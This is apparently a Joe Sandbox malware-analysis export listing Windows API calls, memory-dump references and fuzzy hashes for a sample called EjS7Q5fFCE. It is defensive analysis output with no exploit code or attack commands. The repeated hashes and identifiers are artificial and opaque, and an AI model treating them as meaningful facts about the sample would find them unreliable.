                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043F844
                                                              • IsDebuggerPresent.KERNEL32 ref: 0043F910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043F930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 070c23d94a51bc210bfcef13d86711301551260162b5e91a7630486f57c4e9c1
                                                              • Instruction ID: cbd0e6b8795a24b4ad3be3bbb3334bf05a4865e22ec17d132dbb7f5629fda5a5
                                                              • Opcode Fuzzy Hash: 070c23d94a51bc210bfcef13d86711301551260162b5e91a7630486f57c4e9c1
                                                              • Instruction Fuzzy Hash: D5312B75D0531D9BDB11DFA4D9897CDBBB8AF08705F1040AAE40CA7250EB759B888F48
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,0043E5E8,0000001C,0043E7DD,00000000,?,?,?,?,?,?,?,0043E5E8,00000004,00481CEC,0043E86D), ref: 0043E6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0043E5E8,00000004,00481CEC,0043E86D), ref: 0043E6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: 291cd53576b6d95e2506846f52506b0355e51f22bf7623bd3c6f407bf53ad828
                                                              • Instruction ID: a6a0c122626bdd44104274e70204d4b4abda00eae7f2e0dd9ae84b30335c62b2
                                                              • Opcode Fuzzy Hash: 291cd53576b6d95e2506846f52506b0355e51f22bf7623bd3c6f407bf53ad828
                                                              • Instruction Fuzzy Hash: 42012B326002096BDF14DE6ADC49BDE7BAAEFC8325F0CC121ED19D7290DB38DD058684
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00448FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00448FBF
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00448FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: e8b24e77fcd2816877587030b1255c30695d53d4602b120bc287118242fc273d
                                                              • Instruction ID: f74cdc02b3a43f17764e9d21b6766be09186057fbd78e9adce06f88abaa19d49
                                                              • Opcode Fuzzy Hash: e8b24e77fcd2816877587030b1255c30695d53d4602b120bc287118242fc273d
                                                              • Instruction Fuzzy Hash: 1A31D57490131CABCB21DF25D888B9DBBB8AF08311F5041EAE41CA6251EB349F858F48
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction ID: be6e55717fccfc0207be28e1e05bd49a65fcc2ac69eaeb74caa2d978b3125bd6
                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction Fuzzy Hash: 46022C71E002199BEF14DFA9C9806AEB7F1EF88314F25816AD919E7384D734AE41CB94
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0043AF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0045E72C,?,?), ref: 0043AF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: cc7db4d6a2fd2f9a2d9bd3de02cd0c6bb1b55e65fd14a88ba9e562da1a067019
                                                              • Instruction ID: de7b2d2171537b92533d250ce8d695b5e9defd5a06b2aa169ee1035dd64f5949
                                                              • Opcode Fuzzy Hash: cc7db4d6a2fd2f9a2d9bd3de02cd0c6bb1b55e65fd14a88ba9e562da1a067019
                                                              • Instruction Fuzzy Hash: E2015A3A110308AAD7119F75EC45F9A77B8EF0C751F109032FA09A7191E374AA288BA9
                                                              APIs
                                                              • GetLastError.KERNEL32(00426DDF,00000000,00000400), ref: 00426C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00426C95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 09616acb62f45d14e2985008adff2f10b5554e1012b9a1b973eb2b32cb8b8c33
                                                              • Instruction ID: 2ea2d9cb067944d3a8894145129a794b2fb75499d5e2e89bd7dc4492eb0efd75
                                                              • Opcode Fuzzy Hash: 09616acb62f45d14e2985008adff2f10b5554e1012b9a1b973eb2b32cb8b8c33
                                                              • Instruction Fuzzy Hash: CED05230344300BAEA011F229C06F2B2B98AB40B82FA8C014B680A80E1CA78C820A62D
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004519EF,?,?,00000008,?,?,0045168F,00000000), ref: 00451C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: ff5d203d27c39763558c0d6a4d406ce2300878acba6f6aec634fe2d37a557c48
                                                              • Instruction ID: 312e5b41d1d0c7d0c4d377ff8b28a006156cb23195a5b6869e3c9c89a3e17402
                                                              • Opcode Fuzzy Hash: ff5d203d27c39763558c0d6a4d406ce2300878acba6f6aec634fe2d37a557c48
                                                              • Instruction Fuzzy Hash: 85B14C352106089FD715CF28C486B657BE0FF45366F258659E89ACF3A2C33AED86CB44
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0043F66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: 9cc9f5bf16212c2d413c48c364810e7cff55a9b6f14809b71acb5822b91acab8
                                                              • Instruction ID: f6dd8fc9353bf5af9bd67b2d71957d9bbb71e6ddc9ca35483192e5bd94e8d9f7
                                                              • Opcode Fuzzy Hash: 9cc9f5bf16212c2d413c48c364810e7cff55a9b6f14809b71acb5822b91acab8
                                                              • Instruction Fuzzy Hash: 4F515971D006099FEB28CF95E8817AABBF4FB48304F24983AC411EB361D378E905CB58
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0042B16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 3b7b638fef345a6e7616c5209d2156628dde53720b4a06c21c98aeb1fb2d57d7
                                                              • Instruction ID: 71e48fecd1f81d950dca0ea22982df8b0c9c82285e013eb59b37529b34c9b2e0
                                                              • Opcode Fuzzy Hash: 3b7b638fef345a6e7616c5209d2156628dde53720b4a06c21c98aeb1fb2d57d7
                                                              • Instruction Fuzzy Hash: 33F030B4E002588FDB18CF18EC916EA73F1F748755F1442A6D515937A1D3B4EA80CEA9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 4cf0ee85a25dfb26b76d9792a060250d0f64c0face536f17b87e81163bb962ed
                                                              • Instruction ID: 7632a2a940c512d76d99994df8fe80166c5543c7902782d2a53b4a0e67415fb6
                                                              • Opcode Fuzzy Hash: 4cf0ee85a25dfb26b76d9792a060250d0f64c0face536f17b87e81163bb962ed
                                                              • Instruction Fuzzy Hash: BFC14772A183458FC354CF29D88065AFBE1BFC8608F19892EE998D7312D734E954CB96
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0043F3A5), ref: 0043F9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 91e27d3fc368c1b2ce0bdaaa99472d0a1ad4b1574b726db0ff9c4fffdb378cb7
                                                              • Instruction ID: 1bf81529fdf1381e1363c8001fc8f4c00d529c6339134ebe3657d927ecdb5190
                                                              • Opcode Fuzzy Hash: 91e27d3fc368c1b2ce0bdaaa99472d0a1ad4b1574b726db0ff9c4fffdb378cb7
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 04dd2f979af27fcd6f1ecb03a1c0336c129c5e5310f2f3d513548671db578ae0
                                                              • Instruction ID: 5a961e4af51d7ffc6dbbd38c5430c9a0604020d0d33c030d8dde6c8151bf2c8b
                                                              • Opcode Fuzzy Hash: 04dd2f979af27fcd6f1ecb03a1c0336c129c5e5310f2f3d513548671db578ae0
                                                              • Instruction Fuzzy Hash: 96A01130A022008B83808F30AF0820C3AA8AA002C2308003AA008C0020EA2080A0AB08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction ID: 4d6d187c867e5a61a7bf8c890c2d6e57370ad1a6137eff0ab81dd85d78098854
                                                              • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                              • Instruction Fuzzy Hash: 8F623971604785AFCB15CF28C4906BABBE1BF99304F05D96ED8DA8B342D738E905CB19
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction ID: 3183a6eed1f35315acdeb65bebc2adcfbff6955636f0ef52b34849427f85f892
                                                              • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                              • Instruction Fuzzy Hash: 9B620AB160C3458FCB29DF28C4806B9BBE1BF99304F18956EE8D68B346D734E945CB19
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction ID: c4c3b7f93642e1246f7e444e7ebdea488fafecfa9fd3e9521b43913a04d4c7e9
                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction Fuzzy Hash: AD523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0042E30E
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                                • Part of subcall function 00431DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00461030,00000200,0042D928,00000000,?,00000050,00461030), ref: 00431DC4
                                                              • _strlen.LIBCMT ref: 0042E32F
                                                              • SetDlgItemTextW.USER32(?,0045E274,?), ref: 0042E38F
                                                              • GetWindowRect.USER32(?,?), ref: 0042E3C9
                                                              • GetClientRect.USER32(?,?), ref: 0042E3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0042E475
                                                              • GetWindowRect.USER32(?,?), ref: 0042E4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 0042E4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 0042E4E3
                                                              • GetWindow.USER32(?,00000005), ref: 0042E4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0042E51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 0042E58D
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d$tE
                                                              • API String ID: 2407758923-3367939056
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0044CB66
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C71E
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C730
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C742
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C754
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C766
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C778
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C78A
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C79C
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7AE
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7C0
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7D2
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7E4
                                                                • Part of subcall function 0044C701: _free.LIBCMT ref: 0044C7F6
                                                              • _free.LIBCMT ref: 0044CB5B
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 0044CB7D
                                                              • _free.LIBCMT ref: 0044CB92
                                                              • _free.LIBCMT ref: 0044CB9D
                                                              • _free.LIBCMT ref: 0044CBBF
                                                              • _free.LIBCMT ref: 0044CBD2
                                                              • _free.LIBCMT ref: 0044CBE0
                                                              • _free.LIBCMT ref: 0044CBEB
                                                              • _free.LIBCMT ref: 0044CC23
                                                              • _free.LIBCMT ref: 0044CC2A
                                                              • _free.LIBCMT ref: 0044CC47
                                                              • _free.LIBCMT ref: 0044CC5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: hE
                                                              • API String ID: 161543041-2023966264
                                                              • Opcode ID: 29b11b68a20f8104ec6f2a904a5ad64da65d5282e31131117d9ad6fd2a7b99a6
                                                              • Instruction ID: 8071db56ce898022d935c745a10464a2f1b88e08c2c7d5b20f5eb1cf03e7f757
                                                              • Opcode Fuzzy Hash: 29b11b68a20f8104ec6f2a904a5ad64da65d5282e31131117d9ad6fd2a7b99a6
